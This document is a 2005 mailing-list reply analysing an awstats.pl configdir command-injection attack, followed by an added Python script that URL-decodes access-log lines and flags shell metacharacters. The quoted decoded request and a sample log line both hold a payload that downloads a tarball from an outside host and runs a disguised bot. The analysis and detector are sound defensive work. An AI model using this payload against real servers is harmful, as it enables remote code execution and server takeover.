On Fri, 2005-03-04 at 12:51 -0600, Brian Fahrlander wrote:
> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
>
> > Replace the url-encoded characters and you get:
> >
> > /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
> > zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
> > mech crond;export PATH=;crond;echo e_exp;%00
> >
> > So the attacker has tricked the script into executing a set of shell
> > commands, which include changing directory to /tmp, downloading a
> > tarball from a Romanian site, extracting that tarball and then executing
> > a program from the downloaded and extracted tarball, after renaming it
> > to "crond" in an effort to disguise it.
>
> Damned fine research. Good job; I'm impressed.

Thank you!

Incidentally, some of the suggestions that came up earlier in this
discussion, namely mounting /tmp with the noexec option and running
SELinux, would have foiled *this particular* exploit of the awstats
vulnerability.

Paul.
--
Paul Howarth <paul@xxxxxxxxxxxx>
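The request Paul decoded above only becomes readable once the percent-encoding is stripped; in the raw access log it is a single innocuous-looking string of `%7C`, `%3B` and `%2F`. The following script is an added example, not code from the thread or from the awstats project: it URL-decodes each request line, isolates the awstats `configdir` parameter, and reports any shell metacharacters found in it (the pipe, command separators, and the embedded `%00` NUL used to truncate the string). The log lines are constructed samples in Apache combined format, and the download host in them is a placeholder rather than the site named in the message.

```python
"""Detect awstats.pl configdir command-injection attempts in access logs.

Added example (not from the mailing-list thread). Assumptions: Apache
combined log format, and that a legitimate configdir value never contains
shell metacharacters. Sample lines below are constructed, with a
placeholder download host.
"""
import re
from urllib.parse import unquote, urlsplit

# Characters that have no place in a directory name handed to awstats:
# pipe, command separators, subshell/backtick, and an embedded NUL.
SHELL_META = re.compile(r"[|;`$&\x00]")

# Constructed sample log lines (Apache combined format, abbreviated).
# The second line carries the same injection shape as the decoded request
# in the message above, but against a placeholder host.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Mar/2005:12:40:01 -0600] "GET /cgi-bin/awstats.pl?config=mysite&output=main HTTP/1.1" 200 1234
192.0.2.77 - - [04/Mar/2005:12:41:17 -0600] "GET /cgi-bin/awstats.pl?configdir=%7Cecho%20%3Becho%20b_exp%3Bcd%20%2Ftmp%3Bcurl%20-0%20wget%20download.example.invalid%2Fbadboy.tar.gz%3Btar%20-zxvf%20badboy.tar.gz%3Bcd%20psybnc%3Bmv%20mech%20crond%3Bexport%20PATH%3D%3Bcrond%3Becho%20e_exp%3B%00 HTTP/1.0" 200 0
10.0.0.9 - - [04/Mar/2005:12:42:30 -0600] "GET /cgi-bin/awstats.pl?configdir=%2Fetc%2Fawstats HTTP/1.1" 200 2048
"""

# client, ident, user, [timestamp], "METHOD URI PROTOCOL"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*"'
)


def decode_params(uri):
    """Split the query string and percent-decode keys and values ourselves,
    so that %00 and friends are visible to the metacharacter check."""
    params = {}
    for pair in urlsplit(uri).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def scan_line(line):
    """Return a finding dict for an awstats configdir injection attempt,
    or None for lines that are not awstats requests or carry a clean value."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    if not urlsplit(uri).path.endswith("awstats.pl"):
        return None
    value = decode_params(uri).get("configdir")
    if value is None:
        return None
    hits = sorted(set(SHELL_META.findall(value)))
    if not hits:
        return None
    return {"client": m.group("client"), "time": m.group("time"),
            "configdir": value, "metachars": hits}


def scan_log(text):
    """Scan a whole log (one request per line) and collect the findings."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['client']} at {finding['time']}: configdir contains "
              f"{finding['metachars']!r}")
        print("  decoded:", finding["configdir"].replace("\x00", "<NUL>"))
```

Decoding before matching is the whole point: a pattern written against the raw log would have to enumerate every encoding the attacker might choose, whereas matching on the decoded value catches the `|` and `;` regardless of how they were encoded. The third sample line shows the other side of the check: a `configdir` value that is merely unusual but carries no metacharacters produces no finding, so the rule stays quiet on legitimate traffic.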